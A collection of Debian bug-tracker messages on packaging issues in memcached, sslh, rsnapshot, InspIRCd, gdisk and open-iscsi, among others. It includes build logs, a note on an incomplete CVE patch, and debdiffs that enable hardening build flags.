forwarded 789835 https://code.google.com/p/memcached/issues/detail?id=417 thanks On Wed, 24 Jun 2015 22:02:48 +0100 Dominic Hargreaves d...@earth.li wrote: Source: memcached Version: 1.4.24-1 Severity: serious Justification: FTBFS Hi, This package FTBFS in a clean sid sbuild setup: t/line-lengths.t . ok Timeout.. killing the process t/lru-crawler.t .. Failed 126/221 subtests Seems to be a random issue that affect other distributions (i'm quite sure to have been reproduced at least one time a long time ago, but wrongly guess this was my env): http://forums.famillecollet.com/viewtopic.php?id=3165 https://code.google.com/p/memcached/issues/detail?id=398 http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk I've opened issue on upstream googlecode (as GitHub memcached space don't let me create issues) to have his point of view about this issue. Cheers, Dominic. signature.asc Description: OpenPGP digital signature
Bug#784357: memcached multi instance startup/shutdown broken
On Tue, 05 May 2015 21:02:26 +0300 Albertas Sileika a.sile...@gmail.com wrote: Package: memcached Version: 1.4.21-1.1 Severity: normal Dear Maintainer, Hi, In wheezy there was possibility to start/stop multiple memcached instance via /etc/init.d/memcached. After upgrade to jessie this possibility is lost (without rewriting unit files). You're absolutely right, we didn't have the time to work on this before the release. For now, I don't see any other possibility than writing another systemd unit file (but suggestions are welcome). -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#774707: sslh: Installation of sslh breaks xinetd if clients are connected
tags 774707 + moreinfo thanks Le mardi 06 janvier 2015 à 15:47 +0100, Fabian Kurz a écrit : The problem appears to be in line 32 of postinst: # disable to force user to configure inetd mode # and disable if standalone mode update-inetd --disable https This command appears to fail if there are existing connections to any xinetd service. I use update-inetd to enable/disable the sslh service and this utility seems to (according to description) doesn't support xinetd but the xinetd depends on it. Anyway, i've tested this on jessie: - install xinetd 1:2.3.15-3 (and update-inetd 4.43, by depends) - enable echo service in /etc/xinetd.d/echo and connect to it - install sslh 1.16-2, default standalone - call update-inetd --disable https : # update-inetd --disable https # echo test | nc localhost 7 test ^C My echo session was never disconnected by the removal of sslh and the xinetd service always listen and accept new connections on 7/tcp. Can you reproduce the problem on Jessie ? -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#784915: jessie-pu: package rsnapshot/1.3.1-4
Package: release.debian.org Severity: normal Tags: jessie User: release.debian@packages.debian.org Usertags: pu -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hi, I've introduced [1] in rsnapshot version 1.3.1-4 a problem which affects multiple user: when defining custom ssh_args they're not properly interpreted (erroneously quoted). This seems to be introduced by my refresh of the patch 10_space_destdir [2]. I can propose to fix the first problem by integrating the patch [3] i've prepared for a newer release of the package. Upstream has patched [4] rsnapshot as well. If this is ok, i can prepare a package for stable. Thanks in advance. [1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=717451 [2]: http://sources.debian.net/src/rsnapshot/1.3.1-4/debian/patches/10_space_destdir.diff/ [3]: http://sources.debian.net/src/rsnapshot/1.3.1-6/debian/patches/14_rsync_rsh_quoting.diff/ [4]: https://github.com/rsnapshot/rsnapshot/pull/15 - -- System Information: Debian Release: stretch/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.13.0-49-generic (SMP w/4 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/dash Init: unable to detect -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVT37DAAoJEJmGUYuaqqCl470QAJObTGsO9dcC7Hqv1cCMlf0s 8yJSXf5BfwUeXgydtNsUAvyoN7p2yezAM7+0UmV+7X+Df4cn1mq26EUCqjPDNO/q tjZmZ1c+GKbC7ft1fT7e5lJKZqJMJhoF5l3gN350AX+QO6kflcsbnt+3lpNRBy16 xyIxXpYLOboXysNuQL9xvyRK9z4N8jFml7kUpDrz2SpcDCErXCPg4G3GCVyQaCPA jGMIEspbVQkGhF+0U2SJKjdEdb84UhWpaGuAMXpnZmi3f06+VC+lT0eun/F6Jckn qKNFpSVFjA0ILEVKtue3nkoExso7odl5/sjdfo5kRNs+xTgfL1ZhmTwbilrdQWUi pNJ9hQc1CaUa2j3oMK9Rr/jipzmV6F+EvBu3DUcSxoaNQYzfdBi+y7ZjcqWrYnx1 tE7KgqJi/wIHSRDG7pWVUt6pzHi/dxAAZ3KYP/Ea+BvQhU5za77qwHiriyKtltFr 05IIVkjuI3XFDwxWA4SqEcYACQzCjI8N3n9dClWkjRddI965wAqiziGPeV+d3M/O D8Fv04yoh7nFbOzllp8cL67cwppzR+JC33cEYi3tGASikGLra+/QTlF+x+JzLbJZ pcG9bCDz+pNr8UpCyTjykDCVX3RWeef6uKTgk46A64YbBBtC+qGQHkRZHgfmpuet WSCMd6DQhGf8rgVfxhrB =VMO9 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#717451: rsnapshot Backups broken when ssh_args are set
Le dimanche 10 mai 2015 à 03:14 +0200, John Paul Adrian Glaubitz a écrit : Hello! Hi, That debdiff is incomplete. The description in the changelog of the changes is insufficient and the actual patch is missing as well. Has this issue been fixed upstream already? If yes, we could just cherrypick the patch or upload a new upstream version. I've asked the release team to include the patch for fixing this issue. I'm waiting for them to propose the fixed package (but i maybe have to include it into unstable before). Cheers, Adrian -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#780880: inspircd: CVE-2012-1836 patch incorrect
Le vendredi 20 mars 2015 à 22:05 +, Adam a écrit : Package: inspircd Version: 2.0.5-1+b1 Severity: grave Tags: security Justification: user security hole Hi, I am an upstream maintainer for InspIRCd. The patch you have for CVE-2012-1836 (patches/03_CVE-2012-1836.diff) is not the same patch we released as part of 2.0.7 (there was no 2.0.6) to address the CVE. It appears to be a a version of this commit: https://github.com/inspircd/inspircd/commit/9aa28f3730fb3dd69c1e06f78bb2bbc43d36c684. However this commit was never in a release, and was only in git for about 6 days (due to someone other than me pulling it in). I looked at the CVE and addressed it with two followup commits later. This commit and your patch do not fix the problem. You can still send maliciously crafted packets and cause remote code execution. This was fixed in https://github.com/inspircd/inspircd/commit/ed28c1ba666b39581adb860bf51cdde43c84cc89, prior to the 2.0.7 release. Furthermore, your patch introduces a buffer underflow where it has i =- 12 and not i -= 12. This causes it to start reading from before the packet's buffer. It is unclear to me what this can cause. Additionally, at the same time I commited 58c893e834ff20495d007709220881a3ff13f423 to prevent malicious packets from causing InspIRCd to infinite loop. This is not a part of the CVE as it does not allow remote code execution, but is still a critical problem due to the potential for denial of service. You should perhaps apply these two patches on top of your existing ones, or maybe fetch the dns.cpp file off of 2.0.7 here: https://github.com/inspircd/inspircd/blob/v2.0.7/src/dns.cpp. It does not change much. I would be willing to go through and provide a proper set of patches for this and other less-severe issues if requested. I do not want to do it up front because it would be a lot of work, and I am not sure whether or not it would be accepted. You have a very, very old InspIRCd version, and there is a lot of stuff to sift through (about 3 years). Let me know. I'll try to apply diff for src/dns.cpp between the 2.0.5 and 2.0.7 releases as you suggest it and will test (yes i use personally use inspircd). When done, i'll contact the Debian security team for an upload in the security archive. As the new stable version Debian 8 Jessie is to be freezed/released, i don't think i'll find a sponsor to upload a 2.0.17 backport of inspircd for the current Debian 7 Wheezy. Thanks, Adam signature.asc Description: This is a digitally signed message part
Bug#779797: gdisk: Returns exit code 1 after successful operations
severity 779797 serious thanks Le mercredi 04 mars 2015 à 21:55 +0100, intrig...@debian.org a écrit : Package: gdisk Version: 0.8.10-1 Severity: important X-Debbugs-Cc: u...@451f.org Hi, Hi, tl;dr: * In Wheezy, gdisk correctly returns exit code 0 upon success. * In Jessie, gdisk mistakenly returns exit code 1 after various successful operations. This breaks any tool that uses gdisk for such operations... and bothers checking its exit code. No idea if the reverse-dependencies in Debian are affected, but it does break Tails Installer (not in Debian yet, will be uploaded by the end of August) on Jessie. * This regression has been identified upstream in March, 2014. It was fixed in upstream Git back then. It's the HEAD of their master branch, and no release was put out since. The attached patchset imports the fix from upstream (not the entire commit, that sadly is non-atomic and contains unrelated changes -- just the relevant changes), and updates d/changelog accordingly. I've generated with git format-patch from the Vcs-Git. I've also patched gdisk_test.sh to test return code of partition table creation, like you've made in your test. The attached reproducer script allows anyone to confirm the summary I made above. The results I see on Wheezy, Jessie, and Jessie + the upstream fix follow. With my Tails hat, I'd love to see this bug fixed in Jessie (otherwise we'll have to ship a modified gdisk in Tails). With my Debian hat, I'm unsure. On the one hand, arguably it's not RC, and if nobody reported this bug at this stage of the release cycle, then it's probably big deal to release with it, and not worth taking the risk to modify the package. On the other hand that's a nasty regression, and we don't know how many home-made scripts running under `set -e' will be broken once their authors upgrade their systems to Jessie. Guillaume, what do you think? If you feel it's RC, please bump severity. I can take care of NMU'ing and talking to the release team if it helps — just let me know. I've prepared a fixed version on mentors: http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc It would be great if you can upload it to unstable and include it for Jessie (as i've bumped the severity to serious; i agree with you that without the upstream fix, it can break user scripts). -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#779797: gdisk: Returns exit code 1 after successful operations
On Thu, Mar 12, 2015 at 03:08:31PM +0100, intrigeri wrote: Hi Guillaume, Guillaume Delacour wrote (10 Mar 2015 21:51:39 GMT) : I've also patched gdisk_test.sh to test return code of partition table creation, like you've made in your test. Great! Now, I don't see this change applied upstream, so it should *not* go into the same quilt patch as the one we've cherry-picked from upstream. Could you please fix that? Splitted in two patches. Also, has this additional change been forwarded upstream yet? DEP-3 says Any value other than no or not-needed means that the patch has been forwarded upstream for the Forwarded field. The shell script i've submitted upstream a few years ago need to be modified with redundant if/else blocks. I'm not sure now how to modify all tests to check return codes. I consider my patch as a non-regression test only for this bug. This is why i've made the change in this way. I've prepared a fixed version on mentors: http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc I'm reviewing the one in the Vcs-Git. Hopefully it's the same. Note that the main goal of my review is to increase chances the resulting package is granted an unblock request. * Why was the Bug: DEP-3 field, that was in the patch I've proposed, removed? * Are you sure that the trailing comma in the DEP-3 Origin: field is legit? I've totally imported your proposal and build a new -2 package. Other than these few nitpicking comments, it looks good \o/ It would be great if you can upload it to unstable and include it for Jessie (as i've bumped the severity to serious; i agree with you that without the upstream fix, it can break user scripts). I'll gladly do that once we agree on the content of the package to upload :) Cheers, -- intrigeri -- Guillaume Delacour signature.asc Description: Digital signature
Bug#628659: [php-maint] Bug#628659: please support IPv6 connections
On Tue, 31 May 2011 12:51:49 +0200 martin f krafft madd...@debian.org wrote: forwarded 628659 http://pear.php.net/bugs/bug.php?id=18575 tags 628659 upstream thanks also sprach Thomas Goirand tho...@goirand.fr [2011.05.31.1105 +0200]: While I'm ok to maintain the *package* for php-net-smtp (as being part of the pkg-php team), but I wont do any new code on it (just eventually fixing issues), especially new features. So best might be to send a bug report upstream (there's also a bug tracker at pear.php.net), or send a patch (here and upstream). Done. The problem was in Net::Socket which is a Net::SMTP dependency. Anyway the problem was fixed on version 1.0.13 since 2013-05-22 (and Debian has now 1.0.14 and i've tested the smtp connection with php-net-smtp which is ok with this version). I'll reassign this bug to php-net-socket and mark it fixed in corresponding version. FYI, Net::Socket use php fsockopen() and it first connect to IPv6 when available (not sure how it is managed in the php source code). -- .''`. martin f. krafft madduck@d.o Related projects: : :' : proud Debian developer http://debiansystem.info `. `'` http://people.debian.org/~madduckhttp://vcs-pkg.org `- Debian - when you have better things to do than fixing systems in diving to the bottom of pleasure we bring up more gravel than pearls. -- honoré de balzac signature.asc Description: This is a digitally signed message part
Bug#743310: rsnapshot: Program calls with arguments containing quotations mark don't work anymore
Le lundi 09 février 2015 à 23:07 +, Christoph Egger a écrit : Package: rsnapshot Version: 1.3.1-4 Followup-For: Bug #743310 Hi! Hi, Guess it has something to do with additional quoting. Makes rsnapshot mostly useless for me. I'm sorry to have introduced such a problem by cherry-picked the upstream patch; the last known author is about to abandon the maintenance of rsnapshot (due to inactivity) to other users to fix some old code base of the software (https://github.com/bebehei/rsnapshot/issues/1). I've missed the freeze deadline by trying to update rsnapshot to the last upstream git repo (there was lots of changes and improvements i wanted to be done and the project start to be inactive) and it is too late for this important fix. I'll try to look further on the take over to see what happen. /etc/rsnapshot.conf # ssh has no args passed by default, but you can specify some here. # ssh_args-i /root/.ssh/id_rsa_backup /bin/cp -al /srv/rsnapshot/daily.0 /srv/rsnapshot/daily.1 /usr/bin/rsync -ax --delete --numeric-ids --relative --delete-excluded \ --rsh=/usr/bin/ssh -i /root/.ssh/id_rsa_backup \ user@host:path \ /srv/rsnapshot/daily.0/entry/ rsync: Failed to exec /usr/bin/ssh -i /root/.ssh/id_rsa_backup: No such file or directory (2) rsync error: error in IPC code (code 14) at pipe.c(85) [Receiver=3.1.1] rsync: connection unexpectedly closed (0 bytes received so far) [Receiver] rsync error: error in IPC code (code 14) at io.c(226) [Receiver=3.1.1] -- System Information: Debian Release: 8.0 APT prefers testing APT policy: (500, 'testing') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages rsnapshot depends on: ii liblchown-perl 1.01-2+b1 ii logrotate 3.8.7-1+b1 ii perl5.20.1-5 ii rsync 3.1.1-2+b1 Versions of packages rsnapshot recommends: ii openssh-client [ssh-client] 1:6.7p1-3 rsnapshot suggests no packages. -- Configuration Files: /etc/cron.d/rsnapshot changed [not included] /etc/rsnapshot.conf changed [not included] -- no debconf information signature.asc Description: This is a digitally signed message part
Bug#769261: sslh: FTBFS in jessie/i386: Build killed with signal TERM after 150 minutes of inactivity
On Wed, Nov 12, 2014 at 11:41:57AM +0100, Lucas Nussbaum wrote: Source: sslh Version: 1.16-2 Severity: serious Tags: jessie sid User: debian...@lists.debian.org Usertags: qa-ftbfs-20141112 qa-ftbfs Justification: FTBFS in jessie on i386 Hi, Hi, During a rebuild of all packages in jessie (in a jessie chroot, not a sid chroot), your package failed to build on i386. Relevant part (hopefully): You've missed a relevant part from the build log: [...] ./sslh-select -v -f -u user --listen localhost:9002 --ssh ::1:9000 --ssl ::1:9001 -P /tmp/sslh_test.pid ssh addr: localhost:9000. libwrap service: sshd family 10 10 ssl addr: localhost:9001. libwrap service: (null) family 10 10 listening on: localhost:9002 localhost:9002 timeout: 2 on-timeout: ssh listening to 2 addresses localhost:9002:bind: Address already in use [...] Apparently, the bind of localhost:9002 fail on this machine, is there any other process listening on this socket ? ***Test: One SSL half-started then one SSH Connection refused ***Test: One SSH half-started then one SSL Connection refused cat: /tmp/sslh_test.pid: No such file or directory killing Can't kill a non-numeric process ID at ./t line 221. # Looks like your test exited with 1 before it could output anything. make[1]: *** [test] Error 1 Makefile:99: recipe for target 'test' failed make[1]: Leaving directory '/«PKGBUILDDIR»' dh_auto_test: make -j1 test returned exit code 2 make: *** [build] Error 2 debian/rules:31: recipe for target 'build' failed dpkg-buildpackage: error: debian/rules build gave error exit status 2 Build killed with signal TERM after 150 minutes of inactivity The full build log is available from: http://aws-logs.debian.net/ftbfs-logs/2014/11/12/sslh_1.16-2_jessie-i386.log A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on EC2 VM instances from Amazon Web Services, using a clean, minimal and up-to-date chroot. Every failed build was retried once to eliminate random failures. -- Guillaume Delacour signature.asc Description: Digital signature
Bug#767034: sslh has USELIBWRAP off by default
fixed 767034 1.16-1 thanks Le lundi 27 octobre 2014 à 22:36 +0100, Christian Weinberger a écrit : Package: sslh Version: 1.13b-3.2 Severity: important Dear Maintainer, Hi, sslh has USELIBWRAP off by default while openssh-server has libwrap support enabled by default in Debian. So sslh default is not in line with the openssh-server default, which is in my eyes not what I expected and therefore a security risk. Recommendation: Activate USELIBWRAP by default. USELIBWRAP will be used in the next stable release 1.16-1 (and with LIBCAP for GNU/Linux): http://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/rules#n20 Best regards, Christian -- System Information: Debian Release: 7.7 APT prefers stable APT policy: (600, 'stable'), (500, 'testing'), (50, 'unstable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.16-0.bpo.2-amd64 (SMP w/2 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to de_DE.UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages sslh depends on: ii adduser 3.113+nmu3 ii debconf 1.5.49 ii libc6 2.19-11 ii libconfig91.4.8-5 ii lsb-base 4.1+Debian8+deb7u1 ii update-inetd 4.43 Versions of packages sslh recommends: ii apache2 2.2.22-13+deb7u3 ii apache2-mpm-prefork [httpd] 2.2.22-13+deb7u3 ii dropbear [ssh-server]2012.55-1.3 ii openssh-server [ssh-server] 1:6.0p1-4+deb7u2 Versions of packages sslh suggests: ii xinetd [inet-superserver] 1:2.3.14-7.1+deb7u1 -- Configuration Files: /etc/default/sslh changed [not included] -- debconf information excluded signature.asc Description: This is a digitally signed message part
Bug#767039: FTBFS on GNU/Hurd
Package: memcached Version: 1.4.21-1 Severity: normal -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Just for the record, i tried to fix the FTBFS on GNU/Hurd: * Temp-declare MAXPATHLEN memcached.c, just to continue the build * Build finish well but upstream test suite t/stats-conns.t fail on call of getpeername(2) on a UNIX domain socket as they're not supported on Hurd (pflocal/pf.c, S_socket_whatis_address). Maybe same problem in t/unixsocket.t. I don't really understand why getpeername is called line 415, as tcp_transport is not tcp (need further investigations). Help (and patches) welcome, work started on -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUTsjcAAoJEJmGUYuaqqClOuYP/jQ575e+Y5jitFvFFLurZ5bC 88Tf11z2/PbguDZF7Q8ZPtc9/yKBBP2/vPyxUHF3RGPjFlV6lsbfPWFPSKAuxAF7 0bzOdjoWEByp68KfjiTImukaRukBPfNxUkOJLdSOAABHxtdPo19XDk4hPt0JU+53 FgM8uYolXNz3hcT7Uphs4+Jnu3G9lpl5i3YrdfnaaqoGi6t1xyDSxdH9mJW7/59U DuAFKd9bfkKfiD2dFj/D3hDT8sj4FRd+vpdVNZljhwrkvwkT/vx9a5QgrI/r7C1v f2jqEuwv6ywaImB/QfFLcG/Cj+puc0WwP0bB3qcG3Ig+qu1HP0HW6iydjoQf+wub s4FOh8p+M9/D2F35WAgY9pAI3zvQJLokCIgo7w49cFtVCvs8/ZQ8P+S/hrdcy3ni xkyWyI3ADHVG7xufwPp6Zq39BJCGNU0pVb1GGLpILYpi65gKVuiMvvsM4NC/fADF Rpn7K8YK4rM6nLEorVhlmLUqjhv2uLiMaQFWl1VuNhTcIpDsTf3Bg/DLtD9H04Hg ikJl4obM2CrSf7jlRaIjxHqiwSvQjChrATNkJozcyEcRODiN5q0luwneKXrSiKjd GRDBaM4VDnYD/Rr+hmQL49FQTTate2kZa1RlTYj+ge0SNsJGhEitOgLeUIjGf69S KUojWJB8GQdvi6FS+pk9 =daPC -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#764537: Hardening options incomplete: unapplied FORTIFY_SOURCE
Package: pure-ftpd Version: 1.0.36-2 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Hardened build features used through dpkg-buildflags are all used in the upstream build system (plus bindow and pie). However, the FORTIFY_SOURCE CPPFLAGS is not applied because gcc optimizations are not used, see dpkg-buildflags(1) for more informations. Adding -O2 to CFLAGS in debian/rules seems to be sufficient to enable fortify_source. Please also note that blhc report false positives against build flags because upstream flags are not equals to Debian choices: * CFLAGS + upstream -fno-strict-aliasing -fno-strict-overflow -fstack-protector-all + dpkg-buildflags: -fstack-protector-strong -Wformat -Werror=format-security * LDFLAGS + upstream: -z relro -z now + dpkg-buildflags: -Wl,-z,relro -Wl,-z,now -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUNa1mAAoJEJmGUYuaqqClV1gQAIQDA0pnJEISIKAYAXyxLYO4 sEbLSB3v3sTyw+AISR5/RxqoJ7o8mgdUThLEMmCP4qYJqayqdvVUqDH0bcMJ41rM IiVjdgmu/L5zIyiMHUWWs4LCkhrXQlP6oP8LlEEduuDrMh3dvP4tn7QjrQ1L0SH+ /TLUz+C0brMx6oQ3WVTs5Fowe6/glpNMr2tcIBWCWXjr+KBS1Qjj5JBELM/WcH2G J49yvWGYAwMOmDB9KbhKUJ8O9z+wnZek2ZI9184099zeVpqPFnQSMHf1iW1PU7Hq on438lxHN6seqyLKBQkakntcAC/xZeYjUWBAgcRo/xWmhMcCIebM7vBhyUwRU7+b VUSf2vS5E+4AYsuc00nUp+vTXlDiCihbGLhHG2SPgvvt6EOwVaPXNj8aM9XLnGgE fagnCBI6yg1WYfUX8nSpyLl5Cmu2LOac+ZiE3JR42UCHMxSWXrEA2CgfFxZy345V BPPbESk54Xh60+PVIW4qpcqVYpohSkK5CGlfZntikHUCddLcQjCHoScAZGedUGk+ bYX9YA5Y2c1gqBNaJV6s6X/ra4TWrnSIrnQSqkmJ2Iu/FmSG9ck9yWAG7eKNjdN3 SQa5ctVVaF2tNa8D0luLWHEC5QnCty2r+vtdn0aLqxUPNOqhbZnnuGZNnBy11Gi2 WE8nLadeyDs91M6Ic3D8 =va85 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#764409: Hardening options incomplete
Package: open-iscsi Version: 2.0.873+git0.3b4b4500-4 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please consider re-enabling the previous applied 03_hardened-build-flags.patch as open-isci is currently not fully hardened: missing PIE, relro and bindnow. I've just refreshed the patch to add -fPIC to the open-isns library (see debdiff attached). -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUNFQlAAoJEJmGUYuaqqClakUP/2aDIgds54yEx9e6sKTmrJbC ggjcphA1jaI+yxTulMmbfBg3JqtNRC/lYH6FZu7sTnncfcy5CcoSR+fAhEXd5c0Q C19oT5Y8fFmdBV1w+DgZ9CHZsAdvA+CO+e714WSt7zYnNa+yTSKwJEx3emeRiU3L zFSb8Gudv/hFKJXxzs9sF3K1ZFiy5NwO0BPf6EFrQbFfb3VQKsVYUpWidnowUkM6 lVC+Ay8PBpwa1WtwvfKbYJ3mCOXCYAQDnK4HqwMW8Rf6U9Vn9F9Qm17nB/VxEgXa XRvB2ArYqx5kJ+Vz5dUtgNnNL7gfvTuBZdPj7gfKtuNDXkS4/iVA+JV/vLoMQf0j CxZbA1Ik3uwgH7C13QQH4Lbw9/cUmPHOC4rKX3bSKBoAJx/RyYJTed82dhUYRPRS +/GA8o9FSkh4LAScoNM7dDpycJqDlGFYvXhgDersWh6MdhaHxUEItIbpWMB1lCSu cq4A7sUG1Tu0OqG6y0T7CMB3diuOxTZPFd08LWCb5mvfS/7FE+9tWlvmUV6Rw3gu H6tR4oNGBVMS/nC8Ow8OY2kl/2pk50IS/tQ2PQAFdXltGPI14PZTnHS2V4tEX8Ph sySUGzdfhHl5+E74aqrMPREwVnQF1C5+2r5xjrepPQhIHdmXBDjaj0f1exCUrIPP cZoN/RkycWxwGCA/10xl =MOee -END PGP SIGNATURE- diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/changelog open-iscsi-2.0.873+git0.3b4b4500/debian/changelog --- open-iscsi-2.0.873+git0.3b4b4500/debian/changelog 2014-09-01 11:03:23.0 +0200 +++ open-iscsi-2.0.873+git0.3b4b4500/debian/changelog 2014-10-07 22:48:32.0 +0200 @@ -1,3 +1,11 @@ +open-iscsi (2.0.873+git0.3b4b4500-4.1) unstable; urgency=medium + + * Non-maintainer upload. + * Re-enable 03_hardened-build-flags.patch and refresh it to enable -dPIC +to utils/open-isns lib. + + -- Guillaume Delacour g...@iroqwa.org Sun, 21 Sep 2014 12:06:00 +0200 + open-iscsi (2.0.873+git0.3b4b4500-4) unstable; urgency=medium * [41c7eca] Introduce new architectures based on current build diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch --- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch 2014-08-20 15:53:55.0 +0200 +++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch 2014-10-07 22:45:27.0 +0200 @@ -1,9 +1,9 @@ hardened build flags - wheezy release goal -Index: open-iscsi/usr/Makefile +Index: open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile === open-iscsi.orig/usr/Makefile 2013-11-05 20:56:40.013418719 +0530 -+++ open-iscsi/usr/Makefile 2013-11-05 20:56:40.009418719 +0530 -@@ -28,7 +28,7 @@ +--- open-iscsi-2.0.873+git0.3b4b4500.orig/usr/Makefile open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile +@@ -28,7 +28,7 @@ IPC_OBJ=ioctl.o endif endif @@ -12,7 +12,7 @@ WARNFLAGS ?= -Wall -Wstrict-prototypes CFLAGS += $(OPTFLAGS) $(WARNFLAGS) -I../include -I. -I../utils/open-isns \ -D$(OSNAME) $(IPC_CFLAGS) -@@ -55,14 +55,14 @@ +@@ -55,14 +55,14 @@ all: $(PROGRAMS) iscsid: $(ISCSI_LIB_SRCS) $(INITIATOR_SRCS) $(DISCOVERY_SRCS) \ iscsid.o session_mgmt.o discoveryd.o @@ -30,10 +30,10 @@ clean: rm -f *.o $(PROGRAMS) .depend $(LIBSYS) -Index: open-iscsi/utils/Makefile +Index: open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile === open-iscsi.orig/utils/Makefile 2013-11-05 20:56:40.013418719 +0530 -+++ open-iscsi/utils/Makefile 2013-11-05 20:56:40.009418719 +0530 +--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/Makefile open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile @@ -1,12 +1,12 @@ # This Makefile will work only with GNU make. @@ -49,3 +49,16 @@ clean: rm -f *.o $(PROGRAMS) .depend +Index: open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in +=== +--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/open-isns/Makefile.in open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in +@@ -13,7 +13,7 @@ VARDIR = $(INSTALL_ROOT)$(vardir) + + CC = @CC@ + CPPFLAGS= @CPPFLAGS@ +-CFLAGS = @CFLAGS@ -I. ++CFLAGS = @CFLAGS@ -I. -fPIC + LDFLAGS = @LDFLAGS@ + + LIB = libisns.a diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series --- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series 2014-08-20 15:53:55.0 +0200 +++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series 2014-10-07 21:42:37.0 +0200 @@ -1,4 +1,5 @@ 01_spelling-errors-and-manpage-hyphen-fixes.patch 02_make-iscsistart-a-dynamic-binary.patch +03_hardened-build-flags.patch 04_fix_iscsi_path.patch 05-disable-iscsiuio.patch diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/rules open-iscsi-2.0.873+git0.3b4b4500/debian/rules --- open-iscsi-2.0.873+git0.3b4b4500
Bug#756906: nfs-utils: please use more hardening features
Hello, Applying the attached seems to be sufficient to enable hardened build flags. Maybe interesting to enable PIE and BINDNOW too. diff -Nru nfs-utils-1.2.8/debian/rules nfs-utils-1.2.8/debian/rules --- nfs-utils-1.2.8/debian/rules 2014-08-13 02:12:43.0 +0200 +++ nfs-utils-1.2.8/debian/rules 2014-10-04 16:34:06.0 +0200 @@ -1,8 +1,11 @@ #! /usr/bin/make -f +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk + # Parsing of DEB_BUILD_OPTIONS flags. # Note that nostrip is handled automatically by debhelper. -CFLAGS := -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \ +CFLAGS += -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \ -DGSSD_PIPEFS_DIR=\\\/run/rpc_pipefs\\\ ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS))) signature.asc Description: This is a digitally signed message part
Bug#763687: Please enable hardened build flags
On Thu, Oct 02, 2014 at 10:14:16PM +0200, folkert wrote: Package: multitail Please enable hardening build flags on your package; adding: DPKG_EXPORT_BUILDFLAGS = 1 include /usr/share/dpkg/buildflags.mk Are there any indications that multitail has security problems? Not particular ones, but enabling *FLAGS (which contain security hardening flags now) is a release goal and maybe good for future recompilation archive compiler options. The priority is to enable flags to network daemons, DSA, priority or important and interpreters packages and later on the whole archive. Folkert van Heusden -- You've probably gotten really fed up with never winning in the Mega- Millions lottery. Well, cry no longer: www.smartwinning.info tells you everything that might help you deciding what numbers to choose. With nice graphs and pretty animations! -- -- Guillaume Delacour signature.asc Description: Digital signature
Bug#763687: Please enable hardened build flags
